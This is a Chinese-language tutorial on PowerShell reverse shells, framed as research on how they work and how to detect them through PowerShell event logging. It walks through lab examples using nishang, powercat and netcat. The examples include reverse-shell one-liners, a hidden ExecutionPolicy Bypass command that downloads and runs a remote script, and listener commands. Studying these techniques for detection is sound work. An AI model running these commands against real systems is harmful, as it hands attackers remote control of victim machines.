powershell反弹shell常见方式

反弹Shell原理及检测技术研究

文章目录

   一. 正向连接和反向连接（反弹连接）

       1.1. 正向连接

       1.2. 反向连接（反弹连接）

   二、关于Windows上powershell的配置

       2.1. 开启 PowerShell 日志记录

       2.2. 开启日志订阅机制

       2.3. 启动powershell执行ps脚本

       三、反弹Shell原理

   四. 反弹Shell 实例运行

       4.1. 实例1 Invoke-PowerShellTcp.ps1 运行反弹TCP Shell

           4.1.1. 前期准备

           4.1.2. 基本思路及实现效果

       4.2. 实例2 powercat.ps1运行反弹TCP shell

           4.2.1. 前期准备

           4.2.2. 基本思路和实现效果

       4.3. 实例3 Invoke-PowerShellUdp.ps1运行反弹Udp shell

       4.4. 实例4 使用nishang框架运行反弹Http shell

           4.4.1. 前期准备

           4.4.2. 过程

       4.5. 实例5 反弹ICMPShell

   五.关于windows反弹Shell疑问

       5.1. 多次反弹无法捕获？

       5.2. 目前只支持tcp？

       5.3. 为什么是powershell?

一. 正向连接和反向连接（反弹连接）

1.1. 正向连接

正向连接：我们攻击了一台机器，打开了该机器的一个端口，攻击者在自己的机器去连接目标机器（目标ip：目标机器端口），这是比较常规的形式，我们叫做正向连接。

主动连接

控制端,即客户端

被控制端,即服务端

在以下情况，正向连接会不能用：

   某客户机中了你的网马，但是它在局域网内，你直接连接不了。

   目标机器的ip动态改变，你不能持续控制。

   由于防火墙等限制，对方机器只能发送请求，不能接收请求。

   对于病毒，木马，受害者什么时候能中招，对方的网络环境是什么样的，什么时候开关机等情况都是未知的。

所以建立一个服务端让恶意程序主动连接，才是上策。

1.2. 反向连接（反弹连接）

反弹连接：攻击者指定服务端，受害者主机主动连接攻击者的服务端程序，就叫反弹连接。

主动连接

被控制端,即客户端

控制端,服务端

二、关于Windows上powershell的配置

2.1. 开启 PowerShell 日志记录

cmd运行gpedit.msc打开本地组策略

2.2. 开启日志订阅机制

cmd运行eventvwr.exe打开系统事件日志

应用程序和服务日志->Microsoft->Windows->PowerShell/Operational 产生的 4103 事件日志

4103事件日志 主要记录powershell的操作日志，agent检测也是通过过滤日志信息来判断反弹shell

2.3. 启动powershell执行ps脚本

powershell 设置执行策略：

set-executionpolicy remotesigned

powershell 查看当前执行策略是否为RemoteSigned,是则设置策略成功

get-executionpolicy

右击powershell脚本文件，选中解除锁定，并应用

即可执行Invoke-PowerShellTcp.ps1脚本不报错了

三、反弹Shell原理

最本质的原理：就是攻击者指定服务端，受害者主机主动连接攻击者的服务端程序，建立连接 然后攻击端跟受害者主机通信，受害者主机转发shell输入输出流到攻击端，从而攻击端能够控制受害者主机。

主要区别:在于通信的原理(TCP/UDP/ICMP/HTTP/SSH/TELNET),也可以形容反弹Shell的类型 例如反弹TCP的Shell;

建立通信的方式(执行ps脚本/注入DLL/打开office文件)的方式,分为以下几类:

   受害主机执行基于PowerShell的一类（TCP、UDP、ICMP、Http、SSH隧道、注入DLL）

   受害主机打开office的一类（Empire 结合office反弹shell、利用office OLE对象插入bat文件反弹shell）

从检测的角度，可以将反弹Shell分为以下三种类型：

   第一类反弹Shell：直接重定向Shell的输入输出到Socket

   第二类反弹Shell：通过管道、伪终端等中转，再重定向Shell的输入输出到中转

   第三类反弹Shell：编程语言实现标准输入中转，重定向命令执行的输入到中转

四. 反弹Shell 实例运行

4.1. 实例1 Invoke-PowerShellTcp.ps1 运行反弹TCP Shell

以win10为被控端/受攻击端，kali为控制端/攻击端为例：

4.1.1. 前期准备

完成3.3的powershell的配置

netcat下载安装（被控端和控制端都需要安装）

下载地址：https://eternallybored.org/misc/netcat/netcat-win32-1.12.zip

下载nishang框架：https://github.com/samratashok/nishang

4.1.2. 基本思路及实现效果

创建一个控制端（用VM安装一个Kali或者其他版本Linux安装netcat，Kali自带netcat）运行命令 监听端口9000 等待被控制端主动连接

nc -lvp 9000

被控制端运行Invoke-PowerShellTcp.ps1脚本 默认连接控制端的9000端口

Invoke-PowerShellTcp.ps1 -Reverse -IPAddress 控制端的IP -port 9000

控制端进入交互界面

说明连接成功 控制端可以进行各种控制操作了。

4.2. 实例2 powercat.ps1运行反弹TCP shell

以win10为被控端/受攻击端，kali为控制端/攻击端为例

4.2.1. 前期准备

下载powercat：https://github.com/besimorhino/powercat

这里环境编写Powershell环境 建议vscode+powershell插件

注意：下载脚本运行是没效果的，需要以下操作步骤才能正常使用powercat：

   导入模块 Import-Module .\powercat.ps1

   设置本地脚本执行策略 不验证签名

Set-ExecutionPolicy RemoteSigned

然后就可以正常使用powercat了。

（其他基于powershell的框架基本都是如此）

注意:似乎每次都需要Import-Module脚本才能正常运行脚本

4.2.2. 基本思路和实现效果

同理，如上思路基本相似。

1.攻击端监听一个端口，等待被攻击端主动连接。nc -nlvp 9000

2.被攻击端powershell执行。

powercat -c 192.168.111.132 -p 9000 -e cmd

以下是不下载Powercat的命令

powershell.exe IEX (New-Object System.Net.Webclient).DownloadString("https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1");powercat -c 192.168.111.132 -p 9000 -e cmd

两个命令主要区别在于脚本是否在本地:

   第一个Powercat脚本在本地并且已经安装成了模块

   第二个需要先使用Powershell下载脚本,在执行.

3.效果同上

4.3. 实例3 Invoke-PowerShellUdp.ps1运行反弹Udp shell

攻击端:

监听UDP9000端口

nc -lup 9000

受害端:

进入当前脚本文件夹

Import-Module .\Invoke-PowerShellUdp.ps1
Invoke-PowerShellUdp -Reverse -IPAddress 攻击端IP地址 -port 9000

4.4. 实例4 使用nishang框架运行反弹Http shell

nishang框架的官方教程:https://github.com/samratashok/nishang

参考https://zhuanlan.zhihu.com/p/27723026

4.4.1. 前期准备

攻击端和受害端均为Windows,且此处受害端为http服务端,攻击端为http客户端;

4.4.2. 过程

受害端:

导入Invoke-PoshRatHttp.ps1

Import-Module .\Invoke-PoshRatHttp.ps1# 监听端口,启动http服务
Invoke-PoshRatHttp -IPAddress 192.168.111.132 -Port 9000

输出结果.

最后一行便是给攻击端使用的

攻击端:

powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('http://192.168.111.132:9000/connect'))
>>whoami

便能控制受害端.不过http是短链接 请求返回结果之后就结束了,每次命令都需要重新请求.

4.5. 实例5 反弹ICMPShell

参考

https://blog.csdn.net/qq_39101049/article/details/96191861

https://blog.csdn.net/qq_45625605/article/details/103056458

五.关于windows反弹Shell疑问

5.1. 多次反弹无法捕获？

agent 如果是同一进程反弹 是不会重复上报的

5.2. 目前只支持tcp？

非也非也，只需要支持powershell即可，其他dns,http的脚本都是依托powershell运行，所以只需要解决powershell异常连接监听即可。

5.3. 为什么是powershell?

问题：powershell win7之后才出现，为什么cmd不能呢？

解答：

1.cmd本身是调用已存在的exe，例如ping ipconfig。对于网络请求cmd没有支持的。而powershell是基于.net4.5的 面向对象 有许多模块可以马上直接使用,比如网络相关

2.反弹shell原理是基于被控制端主动连接 控制端，所以被控制端的环境依赖越少越好。Powershell window都有，而且其他需要py,office的对环境和其他条件的限制太大。